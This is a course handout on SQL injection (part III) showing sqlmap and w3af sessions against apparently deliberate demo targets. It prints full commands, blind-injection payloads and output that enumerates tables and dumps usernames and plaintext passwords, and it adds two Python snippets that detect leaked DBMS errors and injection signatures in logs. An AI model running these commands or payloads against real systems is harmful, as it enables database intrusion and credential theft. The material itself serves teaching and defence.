SECURITY
Iván Martín Valderas
SQL INJECTION (III)
Contents
1. [Link]
   A) SQLmap
   b) W3af
2. [Link]
   A) SQLmap
   b) W3af
3. Others:
   [Link]
   A) SQLmap
   B) W3af
   [Link]
   A) SQLmap
   B) W3af
1. [Link]
A) SQLmap
root@bt:/pentest/database/sqlmap# python [Link] -u "[Link] [Link]" --level=3 --risk=3 --flush-session --technique=B --batch
[*] starting at: [Link]

[Link] [INFO] using '/home/stamparm/Work/sqlmap/trunk/sqlmap/output/[Link] [Link]/session' as session file
[Link] [INFO] flushing session file
[Link] [INFO] testing connection to the target url
[Link] [INFO] heuristics detected web page charset 'ascii'
[Link] [INFO] sqlmap got a 302 redirect to '[Link] 0/[Link]'. do you want to follow redirects from now on (or stay on the original page)? [Y/n] Y
[Link] [INFO] testing if the url is stable, wait a few seconds
[Link] [INFO] url is stable
[Link] [INFO] testing if GET parameter 'get' is dynamic
[Link] [WARNING] GET parameter 'get' appears to be not dynamic
[Link] [WARNING] heuristic test shows that GET parameter 'get' might not be injectable
[Link] [INFO] testing sql injection on GET parameter 'get'
[Link] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[Link] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[Link] [INFO] GET parameter 'get' is 'OR boolean-based blind - WHERE or HAVING clause' injectable
[Link] [INFO] checking if the injection point on GET parameter 'get' is a false positive
[Link] [INFO] GET parameter 'get' is vulnerable. Do you want to keep testing the others? [y/N] N
sqlmap identified the following injection points with a total of 88 HTTP(s) requests:
---
Place: GET
Parameter: get
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: get=-9653' OR NOT (7754=7754) AND 'cxJP'='cxJP
---
[Link] [INFO] manual usage of GET payloads requires url encoding
[Link] [INFO] testing Microsoft Access
[Link] [INFO] confirming Microsoft Access
[Link] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: [Link], Microsoft IIS 6.0
back-end DBMS: Microsoft Access
[Link] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 24 times
[Link] [INFO] Fetched data logged to text files under '/home/stamparm/Work/sqlmap/trunk/sqlmap/output/[Link]'
root@bt:/pentest/database/sqlmap# python [Link] -u "[Link]/[Link]?get=email@[Link]" --batch --tables --threads=8
[*] starting at: [Link]

[Link] [INFO] using '/home/stamparm/Work/sqlmap/trunk/sqlmap/output/[Link] [Link]/session' as session file
[Link] [INFO] resuming injection data from session file
[Link] [INFO] resuming back-end DBMS 'microsoft access' from session file
[Link] [INFO] testing connection to the target url
[Link] [INFO] heuristics detected web page charset 'ascii'
[Link] [INFO] sqlmap got a 302 redirect to '[Link] 0/[Link]'. do you want to follow redirects from now on (or stay on the original page)? [Y/n] Y
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: get
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: get=-9653' OR NOT (7754=7754) AND 'cxJP'='cxJP
---
[Link] [INFO] manual usage of GET payloads requires url encoding
[Link] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: [Link], Microsoft IIS 6.0
back-end DBMS: Microsoft Access
[Link] [INFO] fetching tables for database: `Microsoft_Access_masterdb`
[Link] [INFO] fetching number of tables for database '`Microsoft_Access_masterdb`'
[Link] [INFO] retrieved:
[Link] [WARNING] unable to retrieve the number of tables for database '`Microsoft_Access_masterdb`'
[Link] [ERROR] cannot retrieve table names, back-end DBMS is Access
[Link] [INFO] do you want to use common table existence check? [Y/n/q] Y
[Link] [INFO] checking table existence using items from '/home/stamparm/Work/sqlmap/trunk/sqlmap/txt/[Link]'
[Link] [INFO] adding words used on web page to the check list
[Link] [INFO] starting 8 threads
[Link] [INFO] retrieved: password
Database: Microsoft_Access_masterdb
[1 table]
+----------+
| password |
+----------+
[Link] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 3091 times
[Link] [INFO] Fetched data logged to text files under '/home/stamparm/Work/sqlmap/trunk/sqlmap/output/[Link]'

[*] shutting down at: [Link]
root@bt:/pentest/database/sqlmap# python [Link] -u "[Link]/[Link]?get=email@[Link]" --batch --columns -T password --threads=8
[Link] [INFO] using '/home/stamparm/Work/sqlmap/trunk/sqlmap/output/[Link] [Link]/session' as session file
[Link] [INFO] resuming injection data from session file
[Link] [INFO] resuming back-end DBMS 'microsoft access' from session file
[Link] [INFO] resuming brute forced table name 'password' from session file
[Link] [INFO] testing connection to the target url
[Link] [INFO] heuristics detected web page charset 'ascii'
[Link] [INFO] sqlmap got a 302 redirect to '[Link] 0/[Link]'. do you want to follow redirects from now on (or stay on the original page)? [Y/n] Y
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: get
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: get=-9653' OR NOT (7754=7754) AND 'cxJP'='cxJP
---
[Link] [INFO] manual usage of GET payloads requires url encoding
[Link] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: [Link], Microsoft IIS 6.0
back-end DBMS: Microsoft Access
[Link] [ERROR] cannot retrieve column names, back-end DBMS is Access
[Link] [INFO] do you want to use common columns existence check? [Y/n/q] Y
[Link] [INFO] checking column existence using items from '/home/stamparm/Work/sqlmap/trunk/sqlmap/txt/[Link]'
[Link] [INFO] starting 8 threads
[Link] [INFO] retrieved: name
[Link] [INFO] retrieved: country
[Link] [INFO] retrieved: surname
[Link] [INFO] retrieved: pass
[Link] [INFO] retrieved: user
[Link] [INFO] retrieved: admin
[Link] [INFO] retrieved: active
Database: `Microsoft_Access_masterdb`
Table: password
[7 columns]
+---------+-------------+
| Column  | Type        |
+---------+-------------+
| active  | non-numeric |
| admin   | non-numeric |
| country | non-numeric |
| name    | non-numeric |
| pass    | non-numeric |
| surname | non-numeric |
| user    | non-numeric |
+---------+-------------+
[Link] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 2442 times
[Link] [INFO] Fetched data logged to text files under '/home/stamparm/Work/sqlmap/trunk/sqlmap/output/[Link]'
root@bt:/pentest/database/sqlmap# python [Link] -u "[Link]/[Link]?get=email@[Link]" --batch --dump -T password -C admin,pass,surname,user --threads=8 --fresh-queries
[Link] [INFO] using '/home/stamparm/Work/sqlmap/trunk/sqlmap/output/[Link] [Link]/session' as session file
[Link] [INFO] resuming injection data from session file
[Link] [INFO] resuming back-end DBMS 'microsoft access' from session file
[Link] [INFO] resuming brute forced table name 'password' from session file
[Link] [INFO] resuming brute forced column name 'name' for table 'password' from session file
[Link] [INFO] resuming brute forced column name 'country' for table 'password' from session file
[Link] [INFO] resuming brute forced column name 'surname' for table 'password' from session file
[Link] [INFO] resuming brute forced column name 'pass' for table 'password' from session file
[Link] [INFO] resuming brute forced column name 'user' for table 'password' from session file
[Link] [INFO] resuming brute forced column name 'admin' for table 'password' from session file
[Link] [INFO] resuming brute forced column name 'active' for table 'password' from session file
[Link] [INFO] resuming brute forced column name 'name' for table 'password' from session file
[Link] [INFO] testing connection to the target url
[Link] [INFO] heuristics detected web page charset 'ascii'
[Link] [INFO] sqlmap got a 302 redirect to '[Link] 0/[Link]'. do you want to follow redirects from now on (or stay on the original page)? [Y/n] Y
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: get
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: get=-9653' OR NOT (7754=7754) AND 'cxJP'='cxJP
---
[Link] [INFO] manual usage of GET payloads requires url encoding
[Link] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: [Link], Microsoft IIS 6.0
back-end DBMS: Microsoft Access
[Link] [ERROR] cannot retrieve column names, back-end DBMS is Access
[Link] [INFO] fetching column(s) 'admin, surname, user, pass' entries for table 'password' on database 'Microsoft_Access_masterdb'
[Link] [INFO] fetching number of columns 'admin, surname, user, pass' entries for table 'password' on database 'Microsoft_Access_masterdb'
[Link] [INFO] retrieved: 73
[Link] [INFO] fetching number of distinct values for column 'user'
[Link] [INFO] retrieved: 7
[Link] [INFO] fetching number of distinct values for column 'pass'
[Link] [INFO] retrieved: 6
[Link] [INFO] fetching number of distinct values for column 'admin'
[Link] [INFO] retrieved: 2
[Link] [INFO] fetching number of distinct values for column 'surname'
[Link] [INFO] retrieved: 5
[Link] [WARNING] no proper pivot column provided (with unique values). all rows can't be retrieved.
[Link] [INFO] retrieving the length of query output
[Link] [INFO] retrieved: 11
[Link] [INFO] retrieved: 576-11-1121
[Link] [INFO] retrieving the length of query output
[Link] [INFO] retrieved: 4
[Link] [INFO] retrieved: pass
[Link] [INFO] retrieving the length of query output
[Link] [INFO] retrieved: 2
[Link] [INFO] retrieved: no
[Link] [INFO] retrieving the length of query output
[Link] [INFO] retrieved: 5
[Link] [INFO] retrieved: Shawn
[Link] [INFO] retrieving the length of query output
[Link] [INFO] retrieved: 11
[Link] [INFO] retrieved: 576-14-1122
[Link] [INFO] retrieving the length of query output
[Link] [INFO] retrieved: 5
[Link] [INFO] retrieved: divad
[Link] [INFO] retrieving the length of query output
[Link] [INFO] retrieved: 2
[Link] [INFO] retrieved: no
[Link] [INFO] retrieving the length of query output
[Link] [INFO] retrieved:
[Link] [INFO] retrieved:
[Link] [INFO] retrieving the length of query output
[Link] [INFO] retrieved: 11
[Link] [INFO] retrieved: 592-11-8393
[Link] [INFO] retrieving the length of query output
[Link] [INFO] retrieved: 4
[Link] [INFO] retrieved: pass
[Link] [INFO] retrieving the length of query output
[Link] [INFO] retrieved: 2
[Link] [INFO] retrieved: no
[Link] [INFO] retrieving the length of query output
[Link] [INFO] retrieved:
[Link] [INFO] retrieved:
[Link] [INFO] retrieving the length of query output
[Link] [INFO] retrieved: 11
[Link] [INFO] retrieved: 991-99-8765
[Link] [INFO] retrieving the length of query output
[Link] [INFO] retrieved: 14
[Link] [INFO] retrieved: canwehavemoney
[Link] [INFO] retrieving the length of query output
[Link] [INFO] retrieved: 2
[Link] [INFO] retrieved: no
[Link] [INFO] retrieving the length of query output
[Link] [INFO] retrieved:
[Link] [INFO] retrieved:
[Link] [INFO] retrieving the length of query output
[Link] [INFO] retrieved: 5
[Link] [INFO] retrieved: admin
[Link] [INFO] retrieving the length of query output
[Link] [INFO] retrieved: 5
[Link] [INFO] retrieved: admin
[Link] [INFO] retrieving the length of query output
[Link] [INFO] retrieved: 3
[Link] [INFO] retrieved: yes
[Link] [INFO] retrieving the length of query output
[Link] [INFO] retrieved: 5
[Link] [INFO] retrieved: Admin
[Link] [INFO] retrieving the length of query output
[Link] [INFO] retrieved: 13
[Link] [INFO] retrieved: bleh@[Link]
[Link] [INFO] retrieving the length of query output
[Link] [INFO] retrieved: 10
[Link] [INFO] retrieved: bleh88bleh
[Link] [INFO] retrieving the length of query output
[Link] [INFO] retrieved: 2
[Link] [INFO] retrieved: no
[Link] [INFO] retrieving the length of query output
[Link] [INFO] retrieved: 8
[Link] [INFO] retrieved: blehbleh
[Link] [INFO] retrieving the length of query output
[Link] [INFO] retrieved: 4
[Link] [INFO] retrieved: user
[Link] [INFO] retrieving the length of query output
[Link] [INFO] retrieved: 4
[Link] [INFO] retrieved: user
[Link] [INFO] retrieving the length of query output
[Link] [INFO] retrieved: 2
[Link] [INFO] retrieved: no
[Link] [INFO] retrieving the length of query output
[Link] [INFO] retrieved: 4
[Link] [INFO] retrieved: User
[Link] [INFO] retrieving the length of query output
[Link] [INFO] retrieved:
[Link] [INFO] retrieved:
Database: Microsoft_Access_masterdb
Table: password
[7 entries]
+-------+----------------+----------+---------------+
| admin | pass           | surname  | user          |
+-------+----------------+----------+---------------+
| no    | pass           | Shawn    | 576-11-1121   |
| no    | divad          | NULL     | 576-14-1122   |
| no    | pass           | NULL     | 592-11-8393   |
| no    | canwehavemoney | NULL     | 991-99-8765   |
| yes   | admin          | Admin    | admin         |
| no    | bleh88bleh     | blehbleh | bleh@[Link]   |
| no    | user           | User     | user          |
+-------+----------------+----------+---------------+
[Link] [INFO] Table 'Microsoft_Access_masterdb.password' dumped to CSV file '/home/stamparm/Work/sqlmap/trunk/sqlmap/output/[Link]/dump/Microsoft_Access_masterdb/[Link]'
[Link] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 715 times
[Link] [INFO] Fetched data logged to text files under '/home/stamparm/Work/sqlmap/trunk/sqlmap/output/[Link]'
b) W3af
First we configure the program, in console mode from BackTrack 5:

w3af>>> plugins
w3af/plugins>>> audit sqli
w3af/plugins>>> output console,textFile
w3af/plugins>>> output config textFile
w3af/plugins/output/config:textFile>>> set fileName [Link]
w3af/plugins/output/config:textFile>>> back
w3af/plugins>>> back
We run a scan:
w3af>>> target
w3af/config:target>>> set target [Link]
w3af/config:target>>> back
w3af>>> start
Auto-enabling plugin: grep.error500
Found 3 URLs and 5 different points of injection.
The list of URLs is:
- [Link]
- [Link]
- [Link]

The list of fuzzable requests is:
- [Link] | Method: GET
- [Link] | Method: POST | Parameters: (login="", password="", graphicOption="minimum")
- [Link] | Method: POST | Parameters: (login="", password="", graphicOption="minimum", graphicOption="standard")
- [Link] | Method: POST | Parameters: (login="", password="", graphicOption="standard")
- [Link] | Method: POST | Parameters: (txtPassPhrase="", txtHidden="This was h...", txtName="")
A SQL error was found in the response supplied by the web application, the error is (only a fragment is shown): "'80040e14'". The error was found on response with id 23.
A SQL error was found in the response supplied by the web application, the error is (only a fragment is shown): "Microsoft OLE DB Provider for ODBC Drivers". The error was found on response with id 23.
A SQL error was found in the response supplied by the web application, the error is (only a fragment is shown): "[Microsoft][ODBC Microsoft Access Driver]". The error was found on response with id 23.
SQL injection in a Microsoft SQL database was found at: "[Link] using HTTP method POST. The sent post-data was: "login=d'z"0&password=FrAmE30.&graphicOption=minimum&graphicOption=standard". The modified parameter was "login". This vulnerability was found in the request with id 23.
Scan finished in 20 seconds.
w3af>>>
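The three fragments w3af reports above ('80040e14', "Microsoft OLE DB Provider for ODBC Drivers", "[Microsoft][ODBC Microsoft Access Driver]") are the kind of DBMS error text an application should never return to a client; w3af finds the injection simply by seeing them appear in a response. The following is an added example, not w3af's code and not from the original page, of a regression check that greps response bodies for such fragments and, as a false-positive guard, only reports fragments that are absent from a baseline response to the unmodified input. The response bodies, the /app/page.asp path and the extra MySQL / SQL Server signatures are constructed here.

```python
import re

# DBMS error fragments of the kind w3af's sqli audit reports. The three
# Access/ODBC entries are the fragments from the scan above; the MySQL and
# SQL Server entries are well-known equivalents added for completeness.
ERROR_SIGNATURES = {
    "Microsoft Access / ODBC": (
        r"Microsoft OLE DB Provider for ODBC Drivers",
        r"\[Microsoft\]\[ODBC Microsoft Access Driver\]",
        r"'80040e14'",
    ),
    "MySQL": (r"You have an error in your SQL syntax",),
    "Microsoft SQL Server": (r"Unclosed quotation mark after the character string",),
}

# Constructed response bodies (not captured from the page's target).
BASELINE_BODY = "<html><body><h1>Welcome</h1><p>Your request was processed.</p></body></html>"

# Modelled on a classic ASP/ODBC error page, as returned when an injected
# quote breaks the query behind /app/page.asp (hypothetical path).
ERROR_BODY = (
    "<html><body><font face=\"Arial\" size=2>\n"
    "<p>Microsoft OLE DB Provider for ODBC Drivers</font> <font face=\"Arial\" size=2>"
    "error '80040e14'</font>\n"
    "<p><font face=\"Arial\" size=2>[Microsoft][ODBC Microsoft Access Driver] "
    "Syntax error in string in query expression 'email = 'x'''.</font>\n"
    "<p><font face=\"Arial\" size=2>/app/page.asp</font><font face=\"Arial\" size=2>, line 42</font>\n"
    "</body></html>"
)

# A help page that legitimately mentions the driver name in prose: a plain
# grep would flag it, the baseline comparison below does not.
FAQ_BODY = "<p>If the import fails, check that [Microsoft][ODBC Microsoft Access Driver] is installed.</p>"


def find_signatures(body):
    """Return sorted (dbms, matched fragment) pairs found anywhere in body."""
    found = set()
    for dbms, patterns in ERROR_SIGNATURES.items():
        for pat in patterns:
            m = re.search(pat, body)
            if m:
                found.add((dbms, m.group(0)))
    return sorted(found)


def new_error_fragments(baseline_body, mutated_body):
    """Fragments present in the response to a quote-bearing input but absent
    from the baseline response to the unmodified input. Only these indicate
    that the input reached the query and changed the error behaviour."""
    return sorted(set(find_signatures(mutated_body)) - set(find_signatures(baseline_body)))


if __name__ == "__main__":
    for dbms, fragment in new_error_fragments(BASELINE_BODY, ERROR_BODY):
        print(f"leaked {dbms} error fragment: {fragment}")
    print("FAQ page, unchanged by a quote:", new_error_fragments(FAQ_BODY, FAQ_BODY))
```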
2. [Link]
A) SQLmap
root@bt:/pentest/database/sqlmap# python [Link] -u "[Link] [Link]" --data "txtFirstName=Joza&txtLastName=Jozic&txtSocialScurityNo=112-12-3222&txtDOB=1981-11-11&txtAddress=Gornje+Jelenje+3&txtCity=BlizuTamo&drpState=&txtTelephoneNo=&txtEmail=[Link]%[Link]&txtAnnualIncome=10212&drpLoanType=Home&sendbutton1=Submit" --batch --banner --flush-session -p txtAnnualIncome --level=3 --risk=3
[Link] [INFO] using 'pentest/database/sqlmap/output/[Link]/session' as session file
[Link] [INFO] flushing session file
[Link] [INFO] testing connection to the target url
[Link] [INFO] testing if the url is stable, wait a few seconds
[Link] [INFO] url is stable
[Link] [INFO] heuristic test shows that POST parameter 'txtAnnualIncome' might be injectable (possible DBMS: MySQL)
[Link] [INFO] testing sql injection on POST parameter 'txtAnnualIncome'
[Link] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[Link] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[Link] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (Generic comment)'
[Link] [INFO] testing 'Generic boolean-based blind - Parameter replace (original value)'
[Link] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses'
[Link] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[Link] [INFO] testing 'MySQL boolean-based blind - WHERE or HAVING clause (RLIKE)'
[Link] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[Link] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)'
[Link] [INFO] testing 'MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
[Link] [INFO] testing 'MySQL stacked conditional-error blind queries'
[Link] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[Link] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
[Link] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause'
[Link] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause'
[Link] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[Link] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[Link] [INFO] testing 'MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses'
[Link] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[Link] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[Link] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[Link] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[Link] [INFO] POST parameter 'txtAnnualIncome' is 'MySQL < 5.0.12 AND time-based blind (heavy query)' injectable
[Link] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[Link] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[Link] [INFO] testing 'MySQL UNION query (NULL) - 11 to 20 columns'
[Link] [INFO] testing 'MySQL UNION query (random number) - 11 to 20 columns'
[Link] [INFO] testing 'MySQL UNION query (NULL) - 21 to 30 columns'
[Link] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[Link] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
[Link] [INFO] testing 'Generic UNION query (NULL) - 11 to 20 columns'
[Link] [INFO] testing 'Generic UNION query (random number) - 11 to 20 columns'
[Link] [INFO] target url appears to be UNION injectable with 12 columns
[Link] [WARNING] if UNION based SQL injection is not detected, please consider providing --union-char switch (e.g. --union-char=1) and/or try to force the back-end DBMS (e.g. --dbms=mysql)
[Link] [INFO] testing 'Generic UNION query (NULL) - 21 to 30 columns'
[Link] [INFO] checking if the injection point on POST parameter 'txtAnnualIncome' is a false positive
POST parameter 'txtAnnualIncome' is vulnerable. Do you want to keep testing the others? [y/N] N
sqlmap identified the following injection points with a total of 619 HTTP(s) requests:
---
Place: POST
Parameter: txtAnnualIncome
    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: txtFirstName=Joza&txtLastName=Jozic&txtSocialScurityNo=112-12-3222&txtDOB=1981-11-11&txtAddress=Gornje Jelenje 3&txtCity=BlizuTamo&drpState=&txtTelephoneNo=&txtEmail=[Link]@[Link]&txtAnnualIncome=10212 AND 7764=BENCHMARK(5000000,MD5(CHAR(83,69,77,114)))&drpLoanType=Home&sendbutton1=Submit
---
[Link] [INFO] testing MySQL
[Link] [INFO] confirming MySQL
[Link] [WARNING] adjusting time delay to 3 seconds (due to good response times)
[Link] [INFO] the back-end DBMS is MySQL
[Link] [INFO] fetching banner
[Link] [INFO] retrieved: 4.0.18-nt
web server operating system: Windows
web application technology: Apache 2.0.49, PHP 4.3.7
back-end DBMS operating system: Windows
back-end DBMS: MySQL < 5.0.0
banner: '4.0.18-nt'
root@bt:/pentest/database/sqlmap# python [Link] -u "[Link] [Link]" --data "txtFirstName=Joza&txtLastName=Jozic&txtSocialScurityNo=112-12-3222&txtDOB=1981-11-11&txtAddress=Gornje+Jelenje+3&txtCity=BlizuTamo&drpState=&txtTelephoneNo=&txtEmail=[Link]%[Link]&txtAnnualIncome=10212&drpLoanType=Home&sendbutton1=Submit" --batch --current-db
[Link] [INFO] using 'pentest/database/sqlmap/output/[Link]/session' as session file
[Link] [INFO] resuming injection data from session file
[Link] [INFO] resuming back-end DBMS 'mysql 4' from session file
[Link] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: txtAnnualIncome
    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: txtFirstName=Joza&txtLastName=Jozic&txtSocialScurityNo=112-12-3222&txtDOB=1981-11-11&txtAddress=Gornje Jelenje 3&txtCity=BlizuTamo&drpState=&txtTelephoneNo=&txtEmail=[Link]@[Link]&txtAnnualIncome=10212 AND 7764=BENCHMARK(5000000,MD5(CHAR(83,69,77,114)))&drpLoanType=Home&sendbutton1=Submit
---
[Link] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.0.49, PHP 4.3.7
back-end DBMS: MySQL 4
[Link] [INFO] fetching current database
[Link] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[Link] [WARNING] adjusting time delay to 1 second (due to good response times)
bank
current database: 'bank'
[Link] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/[Link]'

[*] shutting down at [Link]
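Both sqlmap sessions above leave traces a defender can look for: in section 1 the boolean-blind payload on the `get` parameter compares a literal with itself (`7754=7754`, `'cxJP'='cxJP`), in section 2 the `txtAnnualIncome` value carries a BENCHMARK heavy query, and in every run one client produces hundreds of HTTP 500 responses while the blind technique probes (24, 3091, 2442 and 715 in the sessions above). The following is an added example, not part of the original page and not sqlmap's code, that applies those checks to constructed Apache-style access log lines; the /app/page.asp path, client addresses, timestamps and the 20-error threshold are assumptions.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Constructed sample, not from the page: Apache combined-format access log
# lines for a hypothetical /app/page.asp. The third line carries the exact
# boolean-blind payload sqlmap reported above, percent-encoded as it would
# reach the server; the other lines are filler traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2012:10:01:01 +0100] "GET /app/page.asp?get=user%40example.test HTTP/1.1" 302 0
10.0.0.5 - - [12/Mar/2012:10:01:02 +0100] "GET /app/page.asp?get=user%40example.test%27 HTTP/1.1" 500 1830
10.0.0.5 - - [12/Mar/2012:10:01:03 +0100] "GET /app/page.asp?get=-9653%27+OR+NOT+%287754%3D7754%29+AND+%27cxJP%27%3D%27cxJP HTTP/1.1" 200 4102
10.0.0.5 - - [12/Mar/2012:10:01:04 +0100] "GET /app/page.asp?get=user%40example.test%22 HTTP/1.1" 500 1830
10.0.0.9 - - [12/Mar/2012:10:01:05 +0100] "GET /app/page.asp?get=user%40example.test HTTP/1.1" 200 4102
"""
# Blind techniques need many probes and each probe that breaks the query
# yields a 500; constructed burst of 30 more failing probes from one client.
SAMPLE_LOG += "".join(
    f'10.0.0.5 - - [12/Mar/2012:10:02:{i:02d} +0100] "GET /app/page.asp?get=probe{i}%27 HTTP/1.1" 500 1830\n'
    for i in range(30)
)

# Access logs do not record POST bodies, so for the section 2 case the
# parameter value has to come from an application or WAF log; it is fed
# to the classifier directly below.
POST_BODY_PARAM = "10212 AND 7764=BENCHMARK(5000000,MD5(CHAR(83,69,77,114)))"

# Signatures of the two techniques confirmed on the page: a literal compared
# with itself (boolean-based blind) and a heavy query or delay function
# (time-based blind). SLEEP/PG_SLEEP/WAITFOR cover other engines.
SIGNATURES = (
    ("boolean-based blind (numeric tautology)",
     re.compile(r"\b(?:OR|AND)\s+(?:NOT\s+)?\(?\s*(\d+)\s*=\s*\1\b", re.I)),
    ("boolean-based blind (string tautology)",
     re.compile(r"([\"'])(\w+)\1\s*=\s*\1\2\b")),
    ("time-based blind (heavy query / delay)",
     re.compile(r"\b(?:BENCHMARK|SLEEP|PG_SLEEP)\s*\(|\bWAITFOR\s+DELAY\b", re.I)),
)

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+'
)


def classify_value(value):
    """Return the names of all signatures matching one decoded parameter value."""
    return [name for name, rx in SIGNATURES if rx.search(value)]


def analyze_log(log_text, error_threshold=20):
    """Flag decoded query-string values that match a signature and clients
    that produced at least error_threshold HTTP 500 responses."""
    hits, errors = [], Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        if m["status"] == "500":
            errors[m["ip"]] += 1
        # The payload is percent-encoded in the log: decode before matching.
        for param, value in parse_qsl(urlsplit(m["target"]).query, keep_blank_values=True):
            for technique in classify_value(value):
                hits.append({"ip": m["ip"], "param": param, "technique": technique, "value": value})
    noisy = sorted(ip for ip, n in errors.items() if n >= error_threshold)
    return {"payload_hits": hits, "noisy_clients": noisy, "error_counts": dict(errors)}


if __name__ == "__main__":
    report = analyze_log(SAMPLE_LOG)
    for hit in report["payload_hits"]:
        print(f'{hit["ip"]} param={hit["param"]}: {hit["technique"]}')
    print("clients with >= 20 HTTP 500s:", report["noisy_clients"])
    print("POST value ->", classify_value(POST_BODY_PARAM))
```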
b) W3af
w3af>>> target
w3af/config:target>>> set target [Link]
w3af/config:target>>> back
w3af>>> start
Found 3 URLs and 5 different points of injection.
The list of URLs is:
- [Link]
- [Link]
- [Link]

The list of fuzzable requests is:
- [Link] | Method: GET
- [Link] | Method: POST | Parameters: (login="", password="", graphicOption="minimum")
- [Link] | Method: POST | Parameters: (login="", password="", graphicOption="minimum", graphicOption="standard")
- [Link] | Method: POST | Parameters: (login="", password="", graphicOption="standard")
- [Link] | Method: POST | Parameters: (txtPassPhrase="", txtHidden="This was h...", txtName="")
SQL injection in a Microsoft SQL database was found at: "[Link] using HTTP method POST. The sent post-data was: "login=d'z"0&password=FrAmE30.&graphicOption=minimum&graphicOption=standard". The modified parameter was "login". This vulnerability was found in the request with id 23.
Scan finished in 13 seconds.
w3af>>>
3. Others: [Link]
A) SQLmap
root@bt:/pentest/database/sqlmap# ./[Link] -u "[Link] -b
[Link] [INFO] using '/pentest/database/sqlmap/output/[Link]/session' as session file
[Link] [INFO] testing connection to the target url
[Link] [INFO] heuristics detected web page charset 'ascii'
[Link] [INFO] testing if the url is stable, wait a few seconds
[Link] [INFO] url is stable
[Link] [INFO] testing if GET parameter 'id' is dynamic
[Link] [INFO] confirming that GET parameter 'id' is dynamic
[Link] [INFO] GET parameter 'id' is dynamic
[Link] [WARNING] heuristic test shows that GET parameter 'id' might not be injectable
[Link] [INFO] testing sql injection on GET parameter 'id'
[Link] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[Link] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
parsed error message(s) showed that the back-end DBMS could be MySQL. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
[Link] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[Link] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[Link] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[Link] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[Link] [WARNING] GET parameter 'id' is not injectable
[Link] [CRITICAL] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests. Rerun by providing either a valid --string or a valid --regexp, refer to the user's manual for details
[Link] [WARNING] HTTP error codes detected during testing:
404 (Not Found) - 88 times
Even though the page was on the list, SQLmap finds no vulnerability in it, and none was detected by hand either; it has probably been fixed.
B) W3af
w3af>>> target
w3af/config:target>>> set target [Link]
w3af/config:target>>> back
w3af>>> start
Found 4 URLs and 6 different points of injection.
The list of URLs is:
- [Link]
- [Link]
- [Link]
- [Link]

The list of fuzzable requests is:
- [Link] | Method: GET
- [Link] | Method: GET
- [Link] | Method: POST | Parameters: (login="", password="", graphicOption="minimum")
- [Link] | Method: POST | Parameters: (login="", password="", graphicOption="minimum", graphicOption="standard")
- [Link] | Method: POST | Parameters: (login="", password="", graphicOption="standard")
